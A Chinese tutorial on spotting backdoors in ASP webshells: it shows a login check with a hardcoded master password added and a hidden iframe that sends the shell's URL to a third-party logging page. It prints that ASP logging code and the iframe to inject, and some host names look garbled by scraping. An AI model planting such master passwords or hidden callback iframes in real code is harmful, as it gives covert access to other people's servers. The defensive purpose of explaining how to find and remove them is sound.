通常加了后门的为了隐秘性,都会加密!所以首先我们要先解密 asp 木马解密工具 解密后先检查有无万能密码,也就是说就算你改了木马的密码,他也能用这个密码来登录 正常的: EnD fUNCtION IF SEssIoN("web2a2dmin")<>UsERpaSs thEn IF requeSt.FoRM("pass")<>"" TheN iF REquesT.foRM("pass")=uSERPASS Then SEsSIoN("web2a2dmin")=uSERPAss rESPOnsE.rEdirEct Url ELse rrs"对不起,密码验证失败!" 加有万能密码的: EnD fUNCtION IF SEssIoN("web2a2dmin")<>UsERpaSs thEn IF requeSt.FoRM("pass")<>"" TheN iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1111111" Then SEsSIoN("web2a2dmin")=uSERPAss rESPOnsE.rEdirEct Url ELse rrs"对不起,密码验证失败!" 1111111就是传说中的万能密码了。 找到万能密码代码后把or request.form("pass")="1111111" 删除就OK了! 下面来找马大多数都喜欢用框架挂马:<iframe src=后门地址width=0 height=0></iframe> 找到后删了,到此asp后门就算剔除了! 下面教大家后门的原理: 这是一段收信的asp代码将其保存为1.asp <%url=Request.ServerVariables("HTTP_Referer") set fs=server.CreateObject("Scripting.FileSystemObject") set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True) file.writeline url file.close HdhCmsTest2cto测试数据 set file=nothing set fs=nothing %> 代码基本意思就是:[HTTP_REFERER] 链接到当前页面的前一页面的URL 地址 简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里 上传到空间比如http://HdhCmsTest2cto测试数据 /1.asp 然后里用 <iframe src=http://HdhCmsTest2cto测试数据 /1.asp width=0 height=0></iframe> 插到asp木马中 那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了
查看更多关于asp木马上留后门的检测和原理 - 网站安全 - 自学的详细内容...